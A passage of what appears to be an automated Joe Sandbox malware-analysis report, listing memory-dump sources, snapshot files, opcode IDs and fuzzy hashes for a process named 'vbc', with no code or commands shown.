                                                                                                                                                                                            • Instruction Fuzzy Hash: 757149B5E103098FDB14DFA8C4586AEB7F2BF89344F24852AE409AB355DB749C46CB81
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 7k
                                                                                                                                                                                            • API String ID: 0-1500864370
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: _;
                                                                                                                                                                                            • API String ID: 0-1153873593
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 8cbg
                                                                                                                                                                                            • API String ID: 0-3663169525
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 7k
                                                                                                                                                                                            • API String ID: 0-1500864370
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: i;
                                                                                                                                                                                            • API String ID: 0-1679830939
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425408932.0000000009EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EF0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9ef0000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425408932.0000000009EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EF0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9ef0000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.426687603.000000000A000000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A000000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a000000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425408932.0000000009EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EF0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9ef0000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425408932.0000000009EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EF0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9ef0000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: c4d004526fa13b61f4ed872092540417872ad5b1e8447f470e4d10123f7f255b
                                                                                                                                                                                            • Instruction ID: ffdecf58530ce233523e28cbc167b7dbe0e40618c468af0aec32d1eab0262e07
                                                                                                                                                                                            • Opcode Fuzzy Hash: c4d004526fa13b61f4ed872092540417872ad5b1e8447f470e4d10123f7f255b
                                                                                                                                                                                            • Instruction Fuzzy Hash: A6B1CE78700204DFEB149B64C9A4F7937A6EB8870AF11506AE7068F7E2CBB5DC50CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425408932.0000000009EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EF0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9ef0000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a4e2ca986637b3f23b05aa85c974e06ed811955bd4c4a448a7784bdb878320eb
                                                                                                                                                                                            • Instruction ID: eac5e39a6751ed5a51746fd2653d5b0e5d3174defc3ea2561dc8ac3a9a7c097b
                                                                                                                                                                                            • Opcode Fuzzy Hash: a4e2ca986637b3f23b05aa85c974e06ed811955bd4c4a448a7784bdb878320eb
                                                                                                                                                                                            • Instruction Fuzzy Hash: 53B1BE78700204DFEB149B64C9A5F7937A6EB8870AF11506AE7068F7E2CBB5DC50CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425408932.0000000009EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EF0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9ef0000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: fd12f3f67f0ede642e5216f7cbf24de14aea234542761f9055db937b2e977072
                                                                                                                                                                                            • Instruction ID: 3d1481b8d24b6d9424ab6ba99f2983a30d49741b47a52c29206fa37625115b67
                                                                                                                                                                                            • Opcode Fuzzy Hash: fd12f3f67f0ede642e5216f7cbf24de14aea234542761f9055db937b2e977072
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8DB1BF78700204DFEB149B64C9A5F7937A6EB8870AF11506AE6068F7E2CBB5DC50CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d780141179779331b3a5c410cf52bc335554c41c88ceb1e6270950e57bd1018b
                                                                                                                                                                                            • Instruction ID: 1c4260c52dcee4adfacead820226189850942f22ac92a6c6f881ef67ff659115
                                                                                                                                                                                            • Opcode Fuzzy Hash: d780141179779331b3a5c410cf52bc335554c41c88ceb1e6270950e57bd1018b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 05A11171B242159BEF14ABB5C95177E73E6AF85244F0484BAE906EB381EF39DC02C361
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.426687603.000000000A000000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A000000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a000000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 4a07bcd1d0a8af67639cb7fa6fd8bd791e7ab8b6286bae47855fca34372ace2b
                                                                                                                                                                                            • Instruction ID: a4fa737433cd8cac527ea080dec9eb5917c78859959409bd3b7c0b71259d6374
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a07bcd1d0a8af67639cb7fa6fd8bd791e7ab8b6286bae47855fca34372ace2b
                                                                                                                                                                                            • Instruction Fuzzy Hash: F7917D70A0020DDFEB64DFA8D498EADBBF6AF48300F14446AE406EB391DB749846CB51
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: c3fff153594d3a9c05a5d6977c8a640fb2793f55f4139c54fda887fdab01eef5
                                                                                                                                                                                            • Instruction ID: 26763698541ae9a17717f0c79b6d905a5adba5b3f538a8914ecc92f11739e61d
                                                                                                                                                                                            • Opcode Fuzzy Hash: c3fff153594d3a9c05a5d6977c8a640fb2793f55f4139c54fda887fdab01eef5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D8117B5B042009FEB009B74D4189AE7BB2EF96244F94C46AE84ADB381DB34DD06CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.426687603.000000000A000000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A000000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a000000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 5c39bc9e84dd7eb5693cd3896a8191196ddec869c9e37c9950e119f4f8a52957
                                                                                                                                                                                            • Instruction ID: fa2473f404c1de63fccd2e017c7568fdfe5d897e5a7a55db4e47cc4e1e3aafed
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c39bc9e84dd7eb5693cd3896a8191196ddec869c9e37c9950e119f4f8a52957
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9461F534B043445FDB199B749858A6EBBE3AFC6244F14886AE406DB3C2DF34DD46CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ae2a01f44ddaf6a806970cb3ac20226994070cd5d475f0e29df84d9e9e949c83
                                                                                                                                                                                            • Instruction ID: d1003ba3db299dffccf1a7e2a2be5a068b03c4b7c55133606855db187043eb92
                                                                                                                                                                                            • Opcode Fuzzy Hash: ae2a01f44ddaf6a806970cb3ac20226994070cd5d475f0e29df84d9e9e949c83
                                                                                                                                                                                            • Instruction Fuzzy Hash: 62514B74E0121DEFDF14DFA4E8989EDBBB6BF88304F108029E816A7364DB349945CB51
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: fcb3cfccefbf00d804a4b8db68d6fdaaf08b16c73e0ed8ca28c958c3de15050a
                                                                                                                                                                                            • Instruction ID: 30b09a973d9ad37a5326610100c02d0d49a4ed745d3cfcbe3dab6ad26f6d41a8
                                                                                                                                                                                            • Opcode Fuzzy Hash: fcb3cfccefbf00d804a4b8db68d6fdaaf08b16c73e0ed8ca28c958c3de15050a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A519135B102089FEB04CF79C981BAEBBE6AF8C344F159079E915DB360EA75DC418B50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.426687603.000000000A000000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A000000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a000000_vbc.jbxd
Memory Dump Source
• Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
Memory Dump Source
• Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
Memory Dump Source
• Source File: 00000002.00000002.426687603.000000000A000000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A000000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_a000000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 70b996b15ddbea313f54b68d68ac4c5e7ab32f33e29192230fd3d1cc1110d6d6
                                                                                                                                                                                            • Instruction ID: 519dec102b1bb76a50460eb74414865d12922012902d8b84265470b4aa36399a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 70b996b15ddbea313f54b68d68ac4c5e7ab32f33e29192230fd3d1cc1110d6d6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 61412879300305AFE7249B74E458A9A7BE6EFD9250B04C17AE809CB782DF34DC06CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 2acd2961dd07d2ded84e23fd42c4c34be73e96117de4cbba777703f40663a46c
                                                                                                                                                                                            • Instruction ID: 2bf505a916008c72f3caa2f0cd296e16712d12847cc582d54cac4b9f454c2aad
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2acd2961dd07d2ded84e23fd42c4c34be73e96117de4cbba777703f40663a46c
                                                                                                                                                                                            • Instruction Fuzzy Hash: FA41EEB5B052058FDB14DB68D8587AEBBB6FF85310F1480BAD409CB395DB358C49CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 64149de9dc390e9b01805c5e9771c3b30d9b2d622f0373bfa70bdd86f81b295f
                                                                                                                                                                                            • Instruction ID: 35d773af96cedad3011fa64988b309d192b5aacd97a1c3ec43c0d634cccd30f1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 64149de9dc390e9b01805c5e9771c3b30d9b2d622f0373bfa70bdd86f81b295f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1951CB74E05218DFCB18DFA4D559AEDBBB2BF89305F20842AE406B7390CB395985CF64
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.426687603.000000000A000000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A000000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a000000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 6e2618de684eb2cc3a4833acc8030f9e4f514fbd1cefda13acf4a810c0c32ebd
                                                                                                                                                                                            • Instruction ID: 39669b38c48da9a4689dc158a13173cc39bde3def373450d906bb5b994ab5858
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e2618de684eb2cc3a4833acc8030f9e4f514fbd1cefda13acf4a810c0c32ebd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 81510734A0020DCFEB64DFA4D589EADBBB6FF44300F158059E806AF2A5CB749845DF40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 0d48255fee9055375bb9bb2417d0e1ce88221c53050e04cd6e9b44e79fdb6544
                                                                                                                                                                                            • Instruction ID: ee356cb468c6eaea223dee4f0c892273bd802b633ce8caecdf3c17ebb7cff219
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d48255fee9055375bb9bb2417d0e1ce88221c53050e04cd6e9b44e79fdb6544
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F415474E10208AFDB18CFA8D854AEDBBB2FF89310F10912AE415BB3A0CB759845CF54
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 5e7b6c5a7408230ab27981e22beaf37ef3e0063eb5149f3323de658a54326046
                                                                                                                                                                                            • Instruction ID: baad07f2f99aac7db49c931181d315d6ad8deb4a722a19205404369f3a9a26a5
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e7b6c5a7408230ab27981e22beaf37ef3e0063eb5149f3323de658a54326046
                                                                                                                                                                                            • Instruction Fuzzy Hash: 383142727081585FCF055B78A815BAF3A979BD6699F048029E809CF384DF39CC1683E6
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425408932.0000000009EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EF0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9ef0000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
